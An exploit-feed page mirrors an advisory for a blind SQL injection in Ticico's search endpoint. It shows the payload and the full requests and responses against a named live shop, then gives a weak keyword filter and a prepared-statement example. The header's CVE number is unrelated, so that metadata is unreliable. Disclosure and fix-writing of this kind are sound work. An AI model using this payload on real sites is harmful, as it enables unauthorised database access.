Ticico - Blind SQL Injection

CVE: CVE-2021-3493
Category: CWE-89
Price: $500
Severity: High
Author: Unknown
Risk: High
Exploitation Type: Remote
Date: 2024-02-20
CVSS: CVSS:4.0/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H/E:F/RL:O/RC:C/CR:H/IR:H/AR:H/MAV:N/MAC:L/MPR:H/MUI:R/MS:U/MC:H/MI:H/MA:H
EPSS: 0.02192
EPSSP: 0.50148

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2024020065

Below is a copy:

Ticico - Blind SQL Injection
Author: Gaddar
Recon Date: 18.02.2024

Vuln: SQL Injection (Blind)
Payload: data' or '1'='1'-- -
Vulnerable File: init.php
Tutorial video: https://www.youtube.com/watch?v=DaBWg1I86PE

Tested on Windows 11 Professional with Burpsuite Community Edition v2023.12.1.5
Website: shop.beyoglucikolata.com.tr

First, the normal (benign) request:

POST /ajax HTTP/2
Host: shop.beyoglucikolata.com.tr
Cookie: PHPSESSID=0373ce0394d206913c0bddfbd779e12c
Content-Length: 49
Sec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://shop.beyoglucikolata.com.tr
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://shop.beyoglucikolata.com.tr/search
Accept-Encoding: gzip, deflate, br
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Priority: u=1, i

type=search_suggestion&c_id=0&q=1&t=1708442363774


Response:

HTTP/2 200 OK
X-Powered-By: PHP/7.3.33
X-Powered-By: PleskLin
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Tue, 20 Feb 2024 15:26:10 GMT
Server: LiteSpeed
Alt-Svc: quic=":443"; ma=2592000; v="39,43,46", h3-Q039=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-23=":443"; ma=2592000, h3-24=":443"; ma=2592000

 <div class="search_suggestion"><span class="search_suggestion_error">Lütfen en az 3 karakter giriniz.</span></div>


Vulnerable request:

POST /ajax HTTP/2
Host: shop.beyoglucikolata.com.tr
Cookie: PHPSESSID=0373ce0394d206913c0bddfbd779e12c
Content-Length: 65
Sec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://shop.beyoglucikolata.com.tr
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://shop.beyoglucikolata.com.tr/search
Accept-Encoding: gzip, deflate, br
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Priority: u=1, i

type=search_suggestion&c_id=0&q=1' or '1'='1'-- -&t=1708442363774

Vulnerable response:

HTTP/2 200 OK
X-Powered-By: PHP/7.3.33
X-Powered-By: PleskLin
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Tue, 20 Feb 2024 15:26:53 GMT
Server: LiteSpeed
Alt-Svc: quic=":443"; ma=2592000; v="39,43,46", h3-Q039=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-23=":443"; ma=2592000, h3-24=":443"; ma=2592000

 <div class="search_suggestion"><a href="https://shop.beyoglucikolata.com.tr/product/beyoglu-kek-askim-sutlu-cikolata-kapli-marsmelovlu-kakaolu-sandvic-kek-30-gr-x-24-adet-sade-p-6">Beyoğlu Kek Aşkım - Sütlü Çikolata Kaplı Marşmelovlu Kakaolu Sandviç Kek 30 Gr X 24 Adet Sade</a></div>
<div class="search_suggestion"><a href="https://shop.beyoglucikolata.com.tr/product/bitter-cikolata-kaplamali-findik-kremali-gofret-36-gr-x-24-adet-p-7">Bitter Çikolata Kaplamalı Fındık Kremalı Gofret 36 Gr X 24 Adet</a></div>
<div class="search_suggestion"><a href="https://shop.beyoglucikolata.com.tr/product/findikli-gofret-sutlu-cikolata-ve-findik-parcacik-kaplamali-kremali-gofret-33-gr-x-24-adet-p-8">Fındıklı Gofret - Sütlü Çikolata Ve Fındık Parçacık Kaplamalı Kremalı Gofret 33 Gr X 24 Adet</a></div>
<div class="search_suggestion"><a href="https://shop.beyoglucikolata.com.tr/product/beyoglu-krem-cikolata-13-findikli-kakaolu-findikli-krema-350-gr-p-9">Beyoğlu Krem Çikolata %13 Fındıklı - Kakaolu Fındıklı Krema 350 Gr</a></div>
<div class="search_suggestion"><a href="https://shop.beyoglucikolata.com.tr/product/beyoglu-fun-sutlu-cikolata-kapli-karamelli-nuga-bar-36-gr-x-24-adet-p-11">Beyoğlu Fun - Sütlü Çikolata Kaplı Karamelli Nuga Bar 36 Gr X 24 Adet</a></div>
<div class="search_suggestion"><a href="https://shop.beyoglucikolata.com.tr/product/beyoglu-fistik-cikolata-kapli-karamelli-yer-fistikli-nuga-bar-50-gr-x-24-adet-p-12">Beyoğlu Fıstık - Çikolata Kaplı Karamelli Yer Fıstıklı Nuga Bar 50 Gr X 24 Adet</a></div>
<div class="search_suggestion"><a href="https://shop.beyoglucikolata.com.tr/product/beyoglu-findiklim-findikli-sutlu-cikolata-38-gr-x-24-adet-p-13">Beyoğlu Fındıklım - Fındıklı Sütlü Çikolata 38 Gr X 24 Adet</a></div>
<div class="search_suggestion"><a href="https://shop.beyoglucikolata.com.tr/product/butun-tane-findikli-sutlu-cikolata-30-gr-x-24-adet-p-14">Bütün Tane Fındıklı Sütlü Çikolata 30 Gr X 24 Adet</a></div>
<div class="search_suggestion"><a href="https://shop.beyoglucikolata.com.tr/product/beyoglu-cikolata-cocorops-sutlu-cikolata-kapli-hindistan-cevizli-bar-50-gr-x-24-adet-p-15">Beyoğlu Çikolata Cocorops Sütlü Çikolata Kaplı Hindistan Cevizli Bar 50 GR x 24 Adet</a></div>
<div class="search_suggestion"><a href="https://shop.beyoglucikolata.com.tr/product/beyoglu-kek-askim-dark-bitter-cikolata-kapli-marsmelovlu-kakaolu-sandvic-kek-30-gr-x-24-adet-sade-p-16">Beyoğlu Kek Aşkım Dark - Bitter Çikolata Kaplı Marşmelovlu Kakaolu Sandviç Kek 30 Gr X 24 Adet Sade</a></div>
<div class="search_suggestion"><a href="https://shop.beyoglucikolata.com.tr/product/beyoglu-fistiklim-antep-fistikli-sutlu-cikolata-38-gr-x-24-adet-p-17">Beyoğlu Fıstıklım - Antep Fıstıklı Sütlü Çikolata 38 Gr X 24 Adet</a></div>
<div class="search_suggestion"><a href="https://shop.beyoglucikolata.com.tr/product/beyoglu-cikolatali-gofret-sutlu-cikolata-kaplamali-findik-kremali-gofret-36-gr-x-24-adet-p-18">Beyoğlu Çikolatalı Gofret - Sütlü Çikolata Kaplamalı Fındık Kremalı Gofret 36 GR x 24 Adet</a></div>


How to fix this vulnerability?

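Add this code to init.php (the init.php in the main directory):

// Stops the request if a value contains " or " (case-insensitive match).
function kontrolEt($veri) {
    // Request values can be arrays (e.g. q[]=...); check each element.
    if (is_array($veri)) {
        foreach ($veri as $alt) {
            kontrolEt($alt);
        }
        return null;
    }
    if (stripos((string) $veri, " or ") !== false) {
        // Message: "The data you entered contains dangerous content. Please contact the administrators."
        die("<center style='20px 0;font-size:22px;'>Girdiğiniz veriler tehlikeli içerikler barındırıyor. Lütfen yetkililerle iletişime geçiniz.</center>");
    }
    return null;
}
// Check every request parameter, except on admin panel routes.
if (route(1) != getAfterSlash(ADMIN_URL)) {
    foreach ($_REQUEST as $param => $value) {
        kontrolEt($value);
    }
}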
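
The filter above checks request values for one keyword; it does not change how the search query is built, and it rejects an ordinary search phrase such as "dark or milk". As an added example (not code from the advisory or from Ticico), the sketch below runs the advisory's payload through a concatenated query and through a bound parameter. The table, its rows, the query shape and the function names are assumptions, and an in-memory SQLite database stands in for the shop's database.

```php
<?php
// Added example, not Ticico code: table, rows and function names are hypothetical.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)");
// Constructed sample rows.
$pdo->exec("INSERT INTO products (name) VALUES
    ('Milk chocolate bar'), ('Hazelnut wafer'), ('Dark or milk gift box')");

// Vulnerable pattern: the request value becomes part of the SQL text.
function searchConcat(PDO $pdo, string $q): array
{
    $sql = "SELECT name FROM products WHERE name LIKE '%" . $q . "%'";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Hardened pattern: the value is bound as data and cannot alter the query structure.
function searchPrepared(PDO $pdo, string $q): array
{
    // Escape LIKE wildcards so % and _ typed by the user match literally.
    $like = '%' . addcslashes($q, '\\%_') . '%';
    $stmt = $pdo->prepare("SELECT name FROM products WHERE name LIKE :q ESCAPE '\\'");
    $stmt->execute([':q' => $like]);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

$payload = "1' or '1'='1'-- -"; // value of q in the advisory's vulnerable request
printf("concatenated query, payload: %d rows\n", count(searchConcat($pdo, $payload)));
printf("prepared query, payload:     %d rows\n", count(searchPrepared($pdo, $payload)));
// A legitimate phrase containing " or " still works when the value is bound.
printf("prepared query, 'dark or milk': %d rows\n", count(searchPrepared($pdo, 'dark or milk')));
```

With bound parameters the payload is treated as a literal search string, so the keyword check in init.php is not what protects the query.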
